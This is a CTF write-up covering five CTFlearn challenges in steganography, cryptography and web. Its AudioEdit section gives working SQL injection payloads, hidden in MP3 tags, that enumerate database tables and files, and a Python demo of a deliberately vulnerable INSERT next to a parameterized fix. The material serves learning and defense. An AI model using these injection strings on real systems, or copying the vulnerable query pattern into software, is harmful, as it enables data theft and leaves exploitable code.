CTF Challenges, June 25th 2021

[Easy] [Web] Where Can My Robot Go?

Where do robots find what pages are on a website?

https://ctflearn.com/challenge/107

Hint:

What does disallow tell a robot?

The challenge description points to the robots.txt file.

Visiting https://ctflearn.com/robots.txt shows "Disallow: /70r3hnanldfspufdsoifnlds.html".

Visiting https://ctflearn.com/70r3hnanldfspufdsoifnlds.html gives the flag.

[Easy] [Forensics] Simple Steganography

Think the flag is somewhere in there. Would you help me find it?

Hint-" Steghide Might be Helpfull"

https://ctflearn.com/challenge/download/894

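The download is an image.

Install steghide with sudo apt install steghide.

Check the file's EXIF information; it contains the hint "keyword myadmin".

Run steghide extract -sf <image> to extract the hidden data. It asks for a passphrase, which is "myadmin".

When it finishes, it produces a raw.txt file; Base64-decoding the string inside gives the flag.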

[Medium] [Miscellaneous] Ambush Mission

Hi, i can’t tell you my name since now i’m in a mission. In case to arrest our fugitive target, our team had been intercepted communication between the target with his fellow and found this image (https://mega.nz/#!TKZ3DabY!BEUHD7VJvq_b-M22eD4VfHv_PPBnW2m7CZUfMbveZYw). It looks like they are going to meet in specific place, but we still don’t know the time yet. Can you help me?

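The download is an image.

Download Stegsolve with wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar.

Open the image in Stegsolve and press the > key until Red plane 0, which reveals a string. Reverse it and Base64-decode it to get the flag.

P.S. A few characters in the string are hard to tell apart and may take several attempts: uppercase I and lowercase l, uppercase O and the digit 0.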

[Hard] [Cryptography] The Simpsons

Ya know, I was thinking… wouldn’t the Simpsons use octal as a base system? They have 8 fingers…

Oh, right! The problem! Ummm, something seems odd about this image…

https://mega.nz/#!yfp1nYrQ!LOz_eucuKkjAaDqVvz3GWgbfdKWn8BhussKZbx6bUMg

The download is an image.

The end of the file's binary data contains something that looks a lot like Python code:

Realistically the Simpsons would use octal instead of decimal!
encoded = 152 162 152 145 162 167 150 172 153 162 145 170 141 162
key = chr(SolutionToDis(110 157 167 040 155 165 143 150 040 144 151 144 040 115 141 147 147 151 145 040 157 162 151 147 151 156 141 154 154 171 040 143 157 163 164 077 040 050 104 151 166 151 144 145 144 040 142 171 040 070 054 040 164 157 040 164 150 145 040 156 145 141 162 145 163 164 040 151 156 164 145 147 145 162 054 040 141 156 144 040 164 150 145 156 040 160 154 165 163 040 146 157 165 162 051))
key = key + key + chr(ord(key)-4)
print(DecodeDat(key=key,text=encoded))

First, decode the two strings from octal to see what they contain:

encoded = "152 162 152 145 162 167 150 172 153 162 145 170 141 162"
encoded = [chr(int(i, base=8)) for i in encoded.split(" ")]
key = "110 157 167 040 155 165 143 150 040 144 151 144 040 115 141 147 147 151 145 040 157 162 151 147 151 156 141 154 154 171 040 143 157 163 164 077 040 050 104 151 166 151 144 145 144 040 142 171 040 070 054 040 164 157 040 164 150 145 040 156 145 141 162 145 163 164 040 151 156 164 145 147 145 162 054 040 141 156 144 040 164 150 145 156 040 160 154 165 163 040 146 157 165 162 051"
key = [chr(int(i, base=8)) for i in key.split(" ")]
print("".join(encoded))
print("".join(key))

Output:

jrjerwhzkrexar

How much did Maggie originally cost? (Divided by 8, to the nearest integer, and then plus four)

Searching for the answer to the question in the second string gives $847.63.

Then run:

key = chr(round(847.63 / 8) + 4)
key = key + key + chr(ord(key) - 4)
print(key)

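This gives the key nnj.

Finally, from reading a solution write-up, I learned that this is a Vigenère cipher.

Decrypting with CyberChef's "Vigenère Decode" operation gives the flag content.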

[Hard] [Web] AudioEdit

I made this cool site for editing audio files. Can you exploit it?

http://web.ctflearn.com/audioedit/

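Upload any MP3 file smaller than 1 MB. The site displays two fields, "Author" and "Title", which come from the uploaded MP3's file details "Contributing artists" and "Title"; both have their last character removed.

Uploading the same file again gives a message that the file already exists, so the file must be stored somewhere.

Change the author to a', 'aa') -- -; and the title to b', 'bb') -- -;. Author becomes a and Title becomes aa. This suggests a database insert statement along the lines of insert into database (..., author, title, ...) values (..., author_value, title_value, ...); with author placed before title.

Change the author to a', (select group_concat(table_name) from information_schema.tables WHERE table_schema=database())) -- - , which gives the table name audioedit.

Change the author to a', (select group_concat(column_name) from information_schema.columns WHERE table_name='audioedit')) -- - , which gives the columns idfileauthortitle.

Change the author to a', (select group_concat(file) from audioedit as tmp)) -- - , which reveals a file named supersecretflagf1le.mp3.

Download that MP3 file from https://web.ctflearn.com/audioedit/supersecretflagf1le.mp3.

Upload it, then drag the Visualisation slider all the way to the right to see the flag.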
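
The guessed INSERT behaviour above, reproduced as an added example that is not part of the original write-up or the site's code. It uses an in-memory SQLite database as a stand-in for the site's real database; the three-column schema, the function names and the file name upload.mp3 are assumptions. The vulnerable form pastes the tag values into the SQL text, the hardened form binds them as parameters.

```python
import sqlite3

# Constructed sample: the Author/Title tag values from the write-up,
# as they would be read from the uploaded MP3's metadata.
AUTHOR_TAG = "a', 'aa') -- -;"
TITLE_TAG = "b', 'bb') -- -;"


def new_db():
    """In-memory stand-in for the site's database (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE audioedit "
               "(id INTEGER PRIMARY KEY, file TEXT, author TEXT, title TEXT)")
    return db


def strip_last(value):
    # The write-up observes that the site drops the last character of each tag.
    return value[:-1]


def insert_vulnerable(db, file, author, title):
    # Vulnerable pattern: metadata from the file becomes part of the SQL text,
    # so a quote in the tag closes the string literal early.
    sql = ("INSERT INTO audioedit (file, author, title) "
           f"VALUES ('{file}', '{strip_last(author)}', '{strip_last(title)}')")
    db.execute(sql)


def insert_parameterized(db, file, author, title):
    # Hardened pattern: values travel as bound parameters, never as SQL text.
    db.execute("INSERT INTO audioedit (file, author, title) VALUES (?, ?, ?)",
               (file, strip_last(author), strip_last(title)))


def stored_row(insert):
    """Insert the sample tags with the given function and return (author, title)."""
    db = new_db()
    insert(db, "upload.mp3", AUTHOR_TAG, TITLE_TAG)
    return db.execute("SELECT author, title FROM audioedit").fetchone()


if __name__ == "__main__":
    print("vulnerable   :", stored_row(insert_vulnerable))
    print("parameterized:", stored_row(insert_parameterized))
```

With the concatenated statement the stored row matches what the write-up saw (Author a, Title aa); with bound parameters the tag text is stored literally and the statement's structure cannot change.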